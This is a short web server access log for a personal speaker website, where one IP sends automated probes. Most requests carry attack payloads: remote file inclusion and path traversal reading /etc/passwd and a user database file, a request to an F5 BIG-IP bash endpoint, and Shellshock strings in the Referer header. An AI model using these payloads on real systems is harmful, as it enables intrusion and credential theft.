147.182.222.20 - - [07/Dec/2022:20:42:52 -0800] "GET /?file=http://0177.0.0.1/etc/passwd HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
185.191.171.34 - - [07/Dec/2022:20:56:32 -0800] "GET /speaker/life_beyond_divorce HTTP/1.1" 200 4914 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "www.mikemarino.us"
147.182.222.20 - - [07/Dec/2022:20:56:56 -0800] "POST /mgmt/tm/util/bash HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:20:59:41 -0800] "GET /logs/downloadMainLog?fname=../../../../../../..//etc/passwd HTTP/1.1" 403 170 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:20:59:45 -0800] "GET /logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json HTTP/1.1" 403 170 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:02:06 -0800] "GET / HTTP/1.1" 200 4548 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:02:10 -0800] "GET /cgi-bin/status HTTP/1.1" 404 88 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:02:14 -0800] "GET /cgi-bin/stats HTTP/1.1" 404 88 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:21:02:17 -0800] "GET /cgi-bin/test HTTP/1.1" 404 88 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
